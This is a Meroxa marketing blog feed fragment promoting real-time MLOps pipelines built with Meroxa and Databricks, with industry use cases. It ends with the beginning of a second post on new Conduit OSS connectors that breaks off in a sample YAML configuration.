&lt;p&gt;MLOps (Machine Learning Operations) is the practice of creating repeatable, scalable processes for developing, deploying, and maintaining machine learning models. It applies DevOps principles—like continuous integration (CI), continuous delivery (CD), and infrastructure as code—to the machine learning lifecycle. This encompasses everything from data collection and feature engineering to model training, validation, deployment, and monitoring.&lt;/p&gt;
&lt;p&gt;Most organizations start with pilot ML projects where data scientists build models offline, test them in staging, and hand them to engineering teams for deployment. However, as ML initiatives become mission-critical, managing data pipelines, versioning models, and monitoring performance grows increasingly complex. MLOps provides the framework to address these challenges.&lt;/p&gt;
&lt;h3&gt;Importance of Real-Time Feedback Loops&lt;/h3&gt;
&lt;p&gt;Traditional ML pipelines are batch-oriented: data is collected in large chunks, processed offline, and used to retrain models periodically—often monthly or weekly. However, industries like finance, e-commerce, ad-tech, and IoT require near-real-time decisions. Even a few hours&apos; delay can mean missed revenue opportunities or undetected critical events like fraud.&lt;/p&gt;
&lt;p&gt;A real-time feedback loop enables models to learn continuously from new data and update their parameters automatically. Combined with robust streaming pipelines and well-orchestrated MLOps practices, real-time feedback helps your models:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Adapt to changing market conditions or user behavior rapidly.&lt;/li&gt;
&lt;li&gt;Reduce error rates by incorporating the latest ground truths.&lt;/li&gt;
&lt;li&gt;Uncover new patterns or anomalies that weren&apos;t visible during initial training.&lt;/li&gt;
&lt;li&gt;Provide immediate insights for operational teams and stakeholders.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, real-time MLOps is about transforming continuous data flows into continuously improving models.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Meroxa for Data Ingestion and Stream Processing&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; is a real-time data platform that simplifies the creation and management of streaming data pipelines. It offers connectors for a wide range of data sources—databases, SaaS applications, event streams, and more—enabling users to ingest data seamlessly. Through its intuitive interface and APIs, Meroxa streamlines the complexity of moving data from point A to point B without requiring heavy, hand-crafted ETL processes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key capabilities&lt;/strong&gt; include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managed Connectors&lt;/strong&gt;: Pre-built connectors for popular data systems (e.g., PostgreSQL, MySQL, MongoDB, Kafka, Salesforce).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Transformations&lt;/strong&gt;: The ability to process, filter, and enrich data on the fly as it moves through the pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-Code/No-Code Approach&lt;/strong&gt;: Users can design pipelines with minimal code overhead, making real-time data movement accessible to a broader team.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architecture&lt;/strong&gt;: Helps ensure that new data is ingested and processed as soon as it’s available, ideal for use cases demanding low latency.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why Meroxa Is Ideal for Real-Time MLOps&lt;/h3&gt;
&lt;p&gt;Machine learning pipelines need continuous, reliable, and high-quality data. In a continuous MLOps scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Volume and Velocity&lt;/strong&gt;: ML pipelines often deal with large data streams—clickstream data, sensor readings, transaction logs—that are best handled by event-driven infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Quality&lt;/strong&gt;: Incomplete or inconsistent data can degrade model performance significantly. Meroxa’s transformation and monitoring features help filter noise, validate records, and maintain data hygiene.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and Flexibility&lt;/strong&gt;: As data scales, so should the underlying pipeline. Meroxa provides auto-scaling and configuration management to handle spikes in incoming streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Low-latency ingestion means that ML models can be retrained or updated quickly when new data indicates a shift in trends.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By offloading the complexities of real-time ingestion and transformations to Meroxa, data teams can concentrate on building better ML models and orchestrating the MLOps pipeline, rather than wrestling with data pipeline intricacies.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Why Databricks for Model Development and Deployment?&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://databricks.com/&quot;&gt;Databricks&lt;/a&gt; offers a unified data analytics platform built on top of Apache Spark, providing a collaborative environment for data engineering, data science, and machine learning teams. Key components of Databricks relevant to MLOps include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Delta Lake&lt;/strong&gt;: A robust data storage layer that allows ACID transactions, schema enforcement, and time travel. This is crucial for maintaining consistency and auditing changes in training data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks MLflow&lt;/strong&gt;: A framework for experiment tracking, model versioning, and deployment. MLflow also integrates with popular ML libraries (e.g., TensorFlow, PyTorch, scikit-learn).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Notebook Collaboration&lt;/strong&gt;: Interactive notebooks allow data scientists and engineers to develop and test models collaboratively in a scalable environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Job Scheduling and Workflows&lt;/strong&gt;: Automate the training, tuning, validation, and deployment steps, integrating them with external systems via REST APIs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Seamless Integration with Meroxa&lt;/h3&gt;
&lt;p&gt;In a continuous MLOps pipeline, Databricks acts as the &lt;strong&gt;brains&lt;/strong&gt; for model training and deployment, while Meroxa handles the &lt;strong&gt;data flow&lt;/strong&gt;. The integration can be configured so that:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Live Data Flow from Meroxa to Databricks&lt;/strong&gt;: Meroxa streams data into a Delta Lake table or an ingestion endpoint that Databricks can consume.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Model Triggering&lt;/strong&gt;: As new data arrives, Databricks jobs can be triggered to retrain models or update inference pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feedback Loop to Meroxa&lt;/strong&gt;: Databricks can push real-time predictions or insights back to a streaming pipeline, enabling downstream systems to act on them immediately.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By combining Meroxa’s real-time data handling with Databricks’ advanced analytics and ML capabilities, organizations can bridge the gap between raw data ingestion and production-grade model deployment.&lt;/p&gt;
&lt;h3&gt;Continuous Model Training and Deployment&lt;/h3&gt;
&lt;p&gt;A hallmark of MLOps is the ability to &lt;strong&gt;continually retrain&lt;/strong&gt; and &lt;strong&gt;redeploy&lt;/strong&gt; models when performance metrics degrade or when data distribution shifts. Databricks facilitates this by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Experiment Tracking with MLflow&lt;/strong&gt;: Each training run is logged, along with hyperparameters, metrics, and metadata. If a newer model outperforms the old one, it can be automatically promoted to production.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Registry&lt;/strong&gt;: Databricks’ model registry helps keep track of multiple versions of models, ensuring that only validated versions reach production environments.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing&lt;/strong&gt;: You can automate unit tests for data transformations, model performance tests, and integration tests to ensure that new models maintain or improve performance.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Building Continuous MLOps Pipelines&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-125659.png&quot; alt=&quot;mermaid-diagram-2025-02-05-125659.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The diagram above illustrates how data flows from various sources into Meroxa, then into Databricks. Once models are trained, validated, and deployed, the results feed back into the pipeline, creating a continuous loop of data and insight.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Sources&lt;/strong&gt;: Real-time data from transactions, sensors, or logs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Ingestion and Transformation&lt;/strong&gt;: Meroxa connectors capture and stream data. Transformations (e.g., data cleaning, enrichment) happen in flight.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Landing in Delta Lake&lt;/strong&gt;: Transformed streams land in a Delta Lake table within Databricks for structured storage and ACID compliance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Training Pipeline&lt;/strong&gt;: A Databricks job automatically triggers to retrain models based on new data availability or on a specific schedule (e.g., every hour or whenever X new records arrive).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Validation and Testing&lt;/strong&gt;: The newly trained model is validated against test sets. Metrics are recorded in MLflow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production Model Deployment&lt;/strong&gt;: If the new model passes validation thresholds, MLflow or the Databricks model registry updates the model version in the production environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Inference&lt;/strong&gt;: The production model can be hosted on Databricks Serving, a REST endpoint, or a streaming pipeline that connects back into Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuous Feedback Loop&lt;/strong&gt;: Predictions and performance metrics are fed back into the pipeline, allowing for ongoing monitoring and retraining.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Real-Time Data &amp;#x26; Model Workflow&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123258.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123258.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the sequence diagram above, &lt;strong&gt;Meroxa (MX)&lt;/strong&gt; streams data to &lt;strong&gt;Databricks (DB)&lt;/strong&gt;, which trains and validates an ML model. Metrics are tracked in &lt;strong&gt;MLflow (MF)&lt;/strong&gt;, and after validation, the new model may replace the existing production model. The pipeline completes when predictions and performance data flow back into Meroxa for real-time consumption by downstream apps.&lt;/p&gt;
&lt;h3&gt;Set Up Meroxa Pipelines&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Configure Connectors&lt;/strong&gt;: Select source connectors (e.g., a payment gateway, Kafka topic, or user activity logs) and a destination connector for Databricks (or a compatible endpoint).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apply Transformations&lt;/strong&gt;: Define real-time transformations such as filtering out invalid records, anonymizing sensitive data, or joining with metadata tables.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor Pipeline Health&lt;/strong&gt;: Use Meroxa&apos;s dashboard or CLI tools to track throughput, latency, and error rates.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Prepare Databricks Workspace&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Provision a Cluster&lt;/strong&gt;: Configure a Databricks cluster with the necessary compute and libraries (Spark MLlib, TensorFlow, PyTorch, etc.)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Create Delta Tables&lt;/strong&gt;: Set up a Delta Lake table schema to accommodate the transformed data from Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integrate MLflow&lt;/strong&gt;: Ensure MLflow is enabled for tracking experiments, models, and parameters.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Design the Training Pipeline&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Notebook Development&lt;/strong&gt;: In a Databricks notebook, define your feature extraction steps, model architecture, and training procedures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Trigger&lt;/strong&gt;: Use Databricks Jobs to schedule or event-trigger your notebook whenever new data arrives in the Delta table.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MLflow Logging&lt;/strong&gt;: Log relevant metrics (accuracy, precision, recall, etc.) to MLflow for each run. Store the trained model artifacts in MLflow&apos;s model registry.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Validate and Deploy Models&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Validation Step&lt;/strong&gt;: Compare the new model&apos;s performance metrics against the currently deployed model.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Release to Production&lt;/strong&gt;: If performance improvements meet your threshold, automatically deploy the new model to a production endpoint or scheduled job for real-time inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rollback Mechanism&lt;/strong&gt;: In case of unexpected performance issues, quickly revert to the previously successful model version stored in MLflow.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Advantages of Continuous Feedback&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Up-to-Date Models&lt;/strong&gt;: Frequent retraining with the latest data minimizes model drift and maintains higher predictive accuracy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Iteration&lt;/strong&gt;: Real-time feedback loops enable rapid testing of new hypotheses and model architectures, accelerating R&amp;#x26;D.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Monitoring&lt;/strong&gt;: As predictions are generated, key metrics (e.g., accuracy, latency, resource usage) are monitored and fed back into the pipeline, creating a continuous improvement loop.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Minimizing Integration Complexity&lt;/h3&gt;
&lt;p&gt;While many solutions claim to support real-time pipelines, &lt;strong&gt;integration complexity&lt;/strong&gt; often stalls adoption. Meroxa, by contrast, is purpose-built to reduce friction at every step:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unified Configuration&lt;/strong&gt;: Instead of juggling various scripts or YAML files across multiple services, Meroxa provides a centralized interface to configure your data flows. This simplifies the pipeline creation process for data engineers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pre-Built Connectors&lt;/strong&gt;: With a library of managed connectors, you can plug into popular data sources (SQL/NoSQL databases, event buses, SaaS applications) without writing custom code. This shortens the timeline from proof-of-concept to production.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Databricks Integration&lt;/strong&gt;: Meroxa automatically routes data to Delta Lake tables or endpoints accessible by Databricks. Configure your pipeline once, and new data flows in near real time—no complicated bridging scripts needed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Self-Service &amp;#x26; Automation&lt;/strong&gt;: Meroxa&apos;s low-code/no-code philosophy lets non-specialists set up and modify streaming pipelines. This frees your core engineering team to focus on higher-level tasks like optimizing models.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Optimizing Total Cost of Ownership (TCO)&lt;/h3&gt;
&lt;p&gt;Beyond easy integration, &lt;strong&gt;cost management&lt;/strong&gt; is a major factor in evaluating any new platform. Meroxa offers significant TCO advantages by:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Reducing Data Engineering Overhead&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Eliminate Custom Code&lt;/strong&gt;: Every hour spent coding one-off connectors or troubleshooting ingestion scripts adds cost. Meroxa&apos;s managed connectors reduce the burden on developers and accelerate time-to-market.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Maintenance&lt;/strong&gt;: Automated pipeline monitoring, schema change handling, and alerting minimize ongoing maintenance. Fewer break-fix cycles mean lower operational costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimizing Compute Resources&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Stream Processing&lt;/strong&gt;: Meroxa processes data continuously, avoiding batch processing spikes. Resources scale with data flow instead of running at full capacity on fixed schedules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Targeted Transformations&lt;/strong&gt;: Pre-processing data in flight ensures only relevant data reaches Databricks or Delta Lake. This upstream filtering reduces storage and CPU usage, especially for large datasets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auto-Scaling &amp;#x26; Pay-as-You-Go&lt;/strong&gt;: Meroxa automatically scales pipeline resources as data volumes change. This ensures you pay only for needed capacity, avoiding costly over-provisioning.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhancing Model Efficiency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Higher-Quality Input&lt;/strong&gt;: Cleaner, more consistent data leads to more effective training runs. Models converge faster and need fewer re-runs, saving Databricks compute costs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Iterations&lt;/strong&gt;: Quick model updates catch performance issues early, preventing wasted compute on suboptimal versions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In short, Meroxa&apos;s approach to data ingestion and stream processing accelerates ML project delivery while controlling compute and operational expenses. When combined with Databricks&apos; scalable environment, you get a cost-effective, robust platform for real-time MLOps at enterprise scale.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Real-World Applications &amp;#x26; Benefits&lt;/h2&gt;
&lt;p&gt;Real-time data ingestion and continuous MLOps aren’t just buzzwords; they solve pressing, bottom-line challenges across various industries. Here’s how it looks in practice, with Meroxa and Databricks delivering &lt;strong&gt;rapid, adaptive&lt;/strong&gt; machine learning.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;E-Commerce&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;E-commerce companies often rely on outdated or batch-driven recommendations, resulting in stale product suggestions that don’t reflect a user’s most recent clicks and purchase behavior. The result? Low engagement and missed upsell opportunities.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With Meroxa handling real-time clickstream ingestion, raw event data (page views, shopping cart activity, searches) continuously streams into Databricks and updates ML models in near real time. As soon as a user clicks on a product, that data is transformed and available for on-the-fly recommendation model retraining or feature updates.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Personalized Offers&lt;/strong&gt;: Visitors immediately see recommendations based on their latest browsing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Increased Conversions&lt;/strong&gt;: By serving fresh, relevant suggestions, conversion rates climb.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Growth&lt;/strong&gt;: Auto-scaling real-time pipelines handle peak traffic during sales events without over-provisioning.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;E-Commerce Real-Time Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123518.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123518.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In this flow, Meroxa ingests high-velocity click events, Databricks trains or updates the recommendation model, and the production environment serves personalized suggestions back to the user in seconds.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Finance&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Banks and payment providers need to detect fraudulent transactions in real time. Traditional batch-based models may flag suspicious activities hours or even days late—leading to financial losses and reputational damage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;By streaming live transaction records into Meroxa from point-of-sale systems and online payment gateways, data is instantly enriched (e.g., geolocation, user profile) and passed into Databricks for anomaly detection model scoring. If anomalies are detected, the system immediately flags or halts suspicious transactions.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced Fraud Losses&lt;/strong&gt;: Instant detection cuts down on unauthorized activity before it escalates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regulatory Compliance&lt;/strong&gt;: Updated models help maintain compliance with fast-changing financial rules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Customer Trust&lt;/strong&gt;: Swift fraud alerts demonstrate robust security measures, boosting brand reputation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Finance Real-Time Fraud Detection Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-125659.png&quot; alt=&quot;mermaid-diagram-2025-02-05-125659.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa collects transactions from multiple sources (POS, online gateways), enriches them, and streams them into Databricks for real-time anomaly detection. Suspicious activities trigger alerts to both internal teams and potentially to the customers themselves.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Healthcare&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Healthcare providers struggle to monitor critical patient data—like heart rate or blood pressure—across thousands of IoT devices, creating a data deluge that’s hard to analyze quickly for early warning signs of complications.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa ingests continuous sensor readings from wearables or in-facility devices, applying transformations for noise reduction and anonymization. Databricks then applies advanced ML models (e.g., anomaly detection) to flag unusual trends in real time. Alerts are pushed back to clinicians or care teams almost instantly.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Proactive Patient Care&lt;/strong&gt;: Immediate alerts allow medical staff to intervene before minor symptoms become major crises.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Management&lt;/strong&gt;: Cloud-based streaming and MLOps can handle thousands (or millions) of devices without bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Research&lt;/strong&gt;: Rich real-time data informs predictive studies, improving overall treatment protocols.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Healthcare Real-Time Monitoring Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123914.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123914.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here, Meroxa handles secure, high-volume ingestion from IoT health devices. Databricks processes and flags critical anomalies so caregivers can respond proactively.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Manufacturing &amp;#x26; IoT&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Factories rely on heavy machinery that can suddenly fail, causing unplanned downtime, safety issues, and lost revenue. Traditional maintenance schedules (weekly or monthly checks) don’t catch emerging problems in real time.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;By streaming sensor data (temperatures, vibration readings, pressure gauges) through Meroxa, anomalies in the data are immediately spotted. Databricks models—trained on historical fault patterns—predict potential failures before they happen, triggering maintenance orders or system shutdowns to prevent accidents.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced Downtime&lt;/strong&gt;: Proactive interventions ensure machines stay operational.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cost Savings&lt;/strong&gt;: Avoiding catastrophic failures saves on repair bills and production delays.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Safety&lt;/strong&gt;: Real-time alerts protect workers and assets by halting malfunctioning equipment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Manufacturing &amp;#x26; IoT Predictive Maintenance Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-124022.png&quot; alt=&quot;mermaid-diagram-2025-02-05-124022.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Sensor data is continuously ingested by Meroxa, then used within Databricks to score for potential failures. Alerts can either notify human operators or automatically shut down risky equipment to avoid accidents.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;Across industries, these use cases demonstrate the clear competitive advantage of continuous MLOps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live Data&lt;/strong&gt; ⇒ &lt;strong&gt;Timely, relevant predictions&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Model Updates&lt;/strong&gt; ⇒ &lt;strong&gt;Adaptive to changing conditions&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Insights&lt;/strong&gt; ⇒ &lt;strong&gt;Proactive, data-driven decisions&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;From e-commerce startups to global banks, Meroxa + Databricks transforms raw data into actionable intelligence—protecting revenue, boosting customer satisfaction, and driving innovation.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;A continuous MLOps pipeline with real-time feedback loops has become essential for staying competitive in today&apos;s data-driven markets. By pairing Meroxa&apos;s real-time data ingestion and stream processing capabilities with Databricks&apos; powerful model development, deployment, and monitoring tools, you can build an end-to-end system that evolves seamlessly with new data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Takeaways&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;MLOps Is the Future of ML&lt;/strong&gt;: Traditional ad-hoc machine learning approaches can&apos;t keep pace with today&apos;s evolving data and business needs. MLOps delivers the repeatability, scalability, and maintainability modern organizations require.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Feedback Loops Drive Better Outcomes&lt;/strong&gt;: By incorporating streaming data into your pipeline, your models learn faster and maintain higher accuracy over time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa and Databricks Form a Powerful Tandem&lt;/strong&gt;: Build intelligent solutions without reinventing data pipelines and machine learning infrastructure from the ground up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Start Small, Scale Fast&lt;/strong&gt;: Begin your continuous MLOps pipeline with a single use case, then expand the framework to additional data sources and models as you grow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal Friction &amp;#x26; Strong ROI&lt;/strong&gt;: Meroxa&apos;s seamless integration and cost-optimizing features make adopting real-time pipelines easier, delivering faster time-to-value and lower TCO.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ready to see how Meroxa and Databricks can transform your ML initiatives? Connect with our team or start a proof of concept (POC). With the right tools and architecture, you&apos;ll be delivering scalable, insightful, and responsive machine learning solutions in no time.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Interested in learning more?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visit &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; to see how their platform simplifies real-time data pipelines. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Unlock New Possibilities with Meroxa's Conduit OSS: New Connectors for Developers]]></title><description><![CDATA[At Meroxa, we’re empowering developers with Conduit OSS, a tool that simplifies real-time data engineering. With our latest release of new connectors, integrating with popular platforms is seamless, accelerating development and delivering real-time data insights. Here's a look at what's available now and what's coming next!]]></description><link>https://meroxa.com/blog/unlock-new-possibilities-with-meroxas-conduit-oss-new-connectors-for-developers</link><guid isPermaLink="false">https://meroxa.com/blog/unlock-new-possibilities-with-meroxas-conduit-oss-new-connectors-for-developers</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 31 Jan 2025 10:25:00 GMT</pubDate><content:encoded>&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we’re empowering developers with &lt;strong&gt;Conduit OSS&lt;/strong&gt;, a tool that simplifies real-time data engineering. With our latest release of new connectors, integrating with popular platforms is seamless, accelerating development and delivering real-time data insights. Here&apos;s a look at what&apos;s available now and what&apos;s coming next!&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Released: New Conduit OSS Connectors&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream Salesforce object changes using the Salesforce Streaming API.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;salesforce-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
